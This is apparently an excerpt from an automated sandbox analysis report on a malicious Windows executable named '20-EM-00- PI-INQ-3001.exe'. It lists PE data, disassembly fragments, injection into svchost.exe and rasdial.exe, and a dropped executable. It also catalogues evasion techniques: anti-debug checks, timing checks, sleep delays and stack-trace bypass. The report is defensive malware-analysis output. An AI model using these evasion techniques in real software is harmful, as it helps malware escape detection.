            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E6C304 LoadLibraryA,GetProcAddress,0_2_00E6C304
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E58719 push FFFFFF8Bh; iretd 0_2_00E5871B
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1E94F push edi; ret 0_2_00E1E951
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1EA68 push esi; ret 0_2_00E1EA6A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E18B85 push ecx; ret 0_2_00E18B98
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1EC43 push esi; ret 0_2_00E1EC45
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1ED2C push edi; ret 0_2_00E1ED2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414833 push ss; retf 1_2_00414842
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041389F push FFFFFFA4h; ret 1_2_004138AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412100 push edi; iretd 1_2_00412101
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403110 push eax; ret 1_2_00403112
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A987 push ebp; ret 1_2_0040A99B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417CE3 push eax; ret 1_2_00417CE4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413FF7 push ss; retf 1_2_0041403C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417FAD push esp; iretd 1_2_00417FB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380225F pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038027FA pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx1_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380283D push eax; iretd 1_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03801368 push eax; iretd 1_2_03801369
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02ABD6A0 push es; iretd 5_2_02ABD6A5
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB8E92 push FFFFFFA4h; ret 5_2_02AB8EA0
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AAF6F2 push B7D34988h; ret 5_2_02AAF6F7
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB76F3 push edi; iretd 5_2_02AB76F4
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AB9E26 push ss; retf 5_2_02AB9E35
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AAFF7A push ebp; ret 5_2_02AAFF8E
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AAF4B6 push ebp; ret 5_2_02AAF46F
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02AAF457 push ebp; ret 5_2_02AAF46F
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F94238 push eax; ret 5_2_02F94247
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F86EF5 push ebp; ret 5_2_02F86EFE
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8E663 push edi; iretd 5_2_02F8E664
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 5_2_02F8FE02 push FFFFFFA4h; ret 5_2_02F8FE10
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DF4A35
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E755FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E755FD
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E133C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E133C7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeAPI/Special instruction interceptor: Address: FF3204
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 9776Jump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99037
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeAPI coverage: 5.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exeAPI coverage: 2.6 %
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe TID: 8188Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe TID: 8188Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8176Thread sleep count: 196 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8176Thread sleep time: -392000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8176Thread sleep count: 9776 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8176Thread sleep time: -19552000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E54696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E54696
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E5C9C7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5C93C FindFirstFileW,FindClose,0_2_00E5C93C
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E5F200
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E5F35D
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E5F65E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E53A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E53A2B
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E53D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E53D4E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E5BF27
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A1C420 FindFirstFileW,FindNextFileW,FindClose,6_2_02A1C420
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DF4AFE
            Source: firefox.exe, 00000007.00000002.2284878740.000001CD3801C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK,
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531276397.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeAPI call chain: ExitProcess graph end nodegraph_0-97352
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004174F3 LdrLoadDll,1_2_004174F3
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E641FD BlockInput,0_2_00E641FD
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DF3B4C
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E25CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00E25CCC
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E6C304 LoadLibraryA,GetProcAddress,0_2_00E6C304
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00FF34D0 mov eax, dword ptr fs:[00000030h]0_2_00FF34D0
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00FF3470 mov eax, dword ptr fs:[00000030h]0_2_00FF3470
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00FF1E70 mov eax, dword ptr fs:[00000030h]0_2_00FF1E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h]1_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h]1_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038663FF mov eax, dword ptr fs:[00000030h]1_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h]1_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h]1_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h]1_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h]1_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390634F mov eax, dword ptr fs:[00000030h]1_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D437C mov eax, dword ptr fs:[00000030h]1_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h]1_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382823B mov eax, dword ptr fs:[00000030h]1_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390625D mov eax, dword ptr fs:[00000030h]1_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h]1_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836259 mov eax, dword ptr fs:[00000030h]1_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
